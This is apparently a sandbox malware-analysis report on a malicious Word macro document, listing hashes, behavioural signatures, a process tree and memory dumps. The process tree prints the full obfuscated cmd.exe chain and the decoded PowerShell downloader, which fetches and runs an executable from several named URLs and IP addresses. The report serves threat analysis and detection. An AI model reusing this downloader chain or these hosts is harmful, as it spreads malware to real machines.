Analysis
-
max time kernel
101s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
04-06-2024 04:10
Behavioral task
behavioral1
Sample
93962c49f6d160592f2a9153880877e7_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
93962c49f6d160592f2a9153880877e7_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
93962c49f6d160592f2a9153880877e7_JaffaCakes118.doc
-
Size
136KB
-
MD5
93962c49f6d160592f2a9153880877e7
-
SHA1
ec4bc19605963436b8d6e1dff29691635df8c033
-
SHA256
1b11eb3250e38969955bc7b5029ec6d82d8a0bb0ac009c7d53290efb491fc85e
-
SHA512
61ef73afe2efdf76b759e94ff3cf9cd1dc0e363234d270e0f57e9d7c1a420f3c490e951ef44a036f19cd4588098c9e45e5e54a27b97c543fb0219b625833e76a
-
SSDEEP
1536:Vwt81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9uD5C5kVH0PdG:M8GhDS0o9zTGOZD6EbzCd9mWFG
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4152 2728 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 25 880 powershell.exe 27 880 powershell.exe 28 880 powershell.exe 94 880 powershell.exe 106 880 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
cmd.execmd.exepid process 4152 cmd.exe 1500 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2728 WINWORD.EXE 2728 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 880 powershell.exe 880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 880 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2728 WINWORD.EXE 2728 WINWORD.EXE 2728 WINWORD.EXE 2728 WINWORD.EXE 2728 WINWORD.EXE 2728 WINWORD.EXE 2728 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WINWORD.EXEcmd.execmd.execmd.execmd.exedescription pid process target process PID 2728 wrote to memory of 4152 2728 WINWORD.EXE cmd.exe PID 2728 wrote to memory of 4152 2728 WINWORD.EXE cmd.exe PID 4152 wrote to memory of 1500 4152 cmd.exe cmd.exe PID 4152 wrote to memory of 1500 4152 cmd.exe cmd.exe PID 1500 wrote to memory of 1980 1500 cmd.exe cmd.exe PID 1500 wrote to memory of 1980 1500 cmd.exe cmd.exe PID 1500 wrote to memory of 2732 1500 cmd.exe cmd.exe PID 1500 wrote to memory of 2732 1500 cmd.exe cmd.exe PID 2732 wrote to memory of 1408 2732 cmd.exe cmd.exe PID 2732 wrote to memory of 1408 2732 cmd.exe cmd.exe PID 1408 wrote to memory of 3236 1408 cmd.exe cmd.exe PID 1408 wrote to memory of 3236 1408 cmd.exe cmd.exe PID 1408 wrote to memory of 3708 1408 cmd.exe find.exe PID 1408 wrote to memory of 3708 1408 cmd.exe find.exe PID 2732 wrote to memory of 880 2732 cmd.exe powershell.exe PID 2732 wrote to memory of 880 2732 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\93962c49f6d160592f2a9153880877e7_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set sLYG=cMzBJfzGbhspuTRPiRmnWwXErcuoTrfw F,HV(j/$Nq{-L'0yKt\g.CS@4Ilk87}e+2=3dZ)A:1DOvYx;a6&&for %R in (40,17,29,76,67,46,60,35,16,46,80,40,42,41,42,67,19,64,31,44,27,8,38,64,25,50,32,41,64,50,53,20,64,8,54,59,16,64,19,50,80,40,54,55,70,67,46,9,50,50,11,73,39,39,16,11,50,77,29,64,10,64,59,59,64,29,53,25,27,18,39,70,79,31,23,56,9,50,50,11,73,39,39,74,68,53,74,66,62,53,74,66,82,53,66,57,66,39,25,54,78,78,78,56,9,50,50,11,73,39,39,74,68,53,66,66,61,53,74,47,47,53,74,68,66,39,9,33,49,41,41,81,75,1,56,9,50,50,11,73,39,39,64,29,16,25,59,64,77,64,19,50,9,81,59,53,25,27,18,39,77,76,26,56,9,50,50,11,73,39,39,31,31,31,53,10,69,77,64,52,81,19,64,25,27,30,29,16,64,19,69,59,48,53,25,27,18,39,33,3,46,53,55,11,59,16,50,37,46,56,46,71,80,40,19,75,1,67,46,28,19,6,46,80,40,9,16,25,32,67,32,46,82,62,57,46,80,40,19,26,11,67,46,29,30,18,46,80,40,1,42,16,67,40,64,19,77,73,50,64,18,11,65,46,51,46,65,40,9,16,25,65,46,53,64,79,64,46,80,30,27,29,64,81,25,9,37,40,60,10,69,32,16,19,32,40,54,55,70,71,43,50,29,48,43,40,42,41,42,53,75,27,31,19,59,27,81,69,33,16,59,64,37,40,60,10,69,34,32,40,1,42,16,71,80,40,9,17,16,67,46,36,45,6,46,80,58,30,32,37,37,7,64,50,44,58,50,64,18,32,40,1,42,16,71,53,59,64,19,52,50,9,32,44,52,64,32,61,47,47,47,47,71,32,43,58,19,77,27,60,64,44,58,50,64,18,32,40,1,42,16,80,40,6,1,6,67,46,16,81,26,46,80,8,29,64,81,60,80,63,63,25,81,50,25,9,43,63,63,40,69,1,38,67,46,3,72,70,46,80,91)do set 4Wx1=!4Wx1!!sLYG:~%R,1!&&if %R==91 echo !4Wx1:~-440!|FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^^^|find "Cons"')DO %C -"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCmD /V:ON/C"set sLYG=cMzBJfzGbhspuTRPiRmnWwXErcuoTrfw F,HV(j/$Nq{-L'0yKt\g.CS@4Ilk87}e+2=3dZ)A:1DOvYx;a6&&for %R in (40,17,29,76,67,46,60,35,16,46,80,40,42,41,42,67,19,64,31,44,27,8,38,64,25,50,32,41,64,50,53,20,64,8,54,59,16,64,19,50,80,40,54,55,70,67,46,9,50,50,11,73,39,39,16,11,50,77,29,64,10,64,59,59,64,29,53,25,27,18,39,70,79,31,23,56,9,50,50,11,73,39,39,74,68,53,74,66,62,53,74,66,82,53,66,57,66,39,25,54,78,78,78,56,9,50,50,11,73,39,39,74,68,53,66,66,61,53,74,47,47,53,74,68,66,39,9,33,49,41,41,81,75,1,56,9,50,50,11,73,39,39,64,29,16,25,59,64,77,64,19,50,9,81,59,53,25,27,18,39,77,76,26,56,9,50,50,11,73,39,39,31,31,31,53,10,69,77,64,52,81,19,64,25,27,30,29,16,64,19,69,59,48,53,25,27,18,39,33,3,46,53,55,11,59,16,50,37,46,56,46,71,80,40,19,75,1,67,46,28,19,6,46,80,40,9,16,25,32,67,32,46,82,62,57,46,80,40,19,26,11,67,46,29,30,18,46,80,40,1,42,16,67,40,64,19,77,73,50,64,18,11,65,46,51,46,65,40,9,16,25,65,46,53,64,79,64,46,80,30,27,29,64,81,25,9,37,40,60,10,69,32,16,19,32,40,54,55,70,71,43,50,29,48,43,40,42,41,42,53,75,27,31,19,59,27,81,69,33,16,59,64,37,40,60,10,69,34,32,40,1,42,16,71,80,40,9,17,16,67,46,36,45,6,46,80,58,30,32,37,37,7,64,50,44,58,50,64,18,32,40,1,42,16,71,53,59,64,19,52,50,9,32,44,52,64,32,61,47,47,47,47,71,32,43,58,19,77,27,60,64,44,58,50,64,18,32,40,1,42,16,80,40,6,1,6,67,46,16,81,26,46,80,8,29,64,81,60,80,63,63,25,81,50,25,9,43,63,63,40,69,1,38,67,46,3,72,70,46,80,91)do set 4Wx1=!4Wx1!!sLYG:~%R,1!&&if %R==91 echo !4Wx1:~-440!|FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^^^|find "Cons"')DO %C -"3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $RrO='kHi';$qNq=new-object Net.WebClient;$CSZ='http://iptvreseller.com/ZxwE@http://13.127.126.242/cCYYY@http://13.228.100.132/hFKNNaDM@http://ericleventhal.com/vOu@http://www.sdveganecofriendly.com/FB'.Split('@');$nDM='Tnz';$hic = '674';$nup='rfm';$Mqi=$env:temp+'\'+$hic+'.exe';foreach($ksd in $CSZ){try{$qNq.DownloadFile($ksd, $Mqi);$hRi='VLz';If ((Get-Item $Mqi).length -ge 80000) {Invoke-Item $Mqi;$zMz='iau';break;}}catch{}}$dMj='BAZ';"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=b\KD. tokens=9" %C IN ('ftype^|find "Cons"') DO %C -"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ftype|find "Cons"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ftype"6⤵
-
C:\Windows\system32\find.exefind "Cons"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\TCD77A1.tmp\sist02.xslFilesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fatsvks3.lov.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/880-45-0x0000022FC34D0000-0x0000022FC34F2000-memory.dmpFilesize
136KB
-
memory/880-56-0x0000022FC3A90000-0x0000022FC3B06000-memory.dmpFilesize
472KB
-
memory/880-55-0x0000022FC39C0000-0x0000022FC3A04000-memory.dmpFilesize
272KB
-
memory/2728-20-0x00007FF82B300000-0x00007FF82B310000-memory.dmpFilesize
64KB
-
memory/2728-1-0x00007FF82DAB0000-0x00007FF82DAC0000-memory.dmpFilesize
64KB
-
memory/2728-7-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-9-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-10-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-12-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-14-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-13-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-15-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-11-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-17-0x00007FF82B300000-0x00007FF82B310000-memory.dmpFilesize
64KB
-
memory/2728-16-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-8-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-19-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-18-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-5-0x00007FF86DACD000-0x00007FF86DACE000-memory.dmpFilesize
4KB
-
memory/2728-44-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-43-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-42-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-0-0x00007FF82DAB0000-0x00007FF82DAC0000-memory.dmpFilesize
64KB
-
memory/2728-6-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-2-0x00007FF82DAB0000-0x00007FF82DAC0000-memory.dmpFilesize
64KB
-
memory/2728-3-0x00007FF82DAB0000-0x00007FF82DAC0000-memory.dmpFilesize
64KB
-
memory/2728-4-0x00007FF82DAB0000-0x00007FF82DAC0000-memory.dmpFilesize
64KB
-
memory/2728-504-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-541-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-542-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-545-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-544-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-543-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-546-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-547-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-548-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB
-
memory/2728-573-0x00007FF82DAB0000-0x00007FF82DAC0000-memory.dmpFilesize
64KB
-
memory/2728-572-0x00007FF82DAB0000-0x00007FF82DAC0000-memory.dmpFilesize
64KB
-
memory/2728-571-0x00007FF82DAB0000-0x00007FF82DAC0000-memory.dmpFilesize
64KB
-
memory/2728-570-0x00007FF82DAB0000-0x00007FF82DAC0000-memory.dmpFilesize
64KB
-
memory/2728-574-0x00007FF86DA30000-0x00007FF86DC25000-memory.dmpFilesize
2.0MB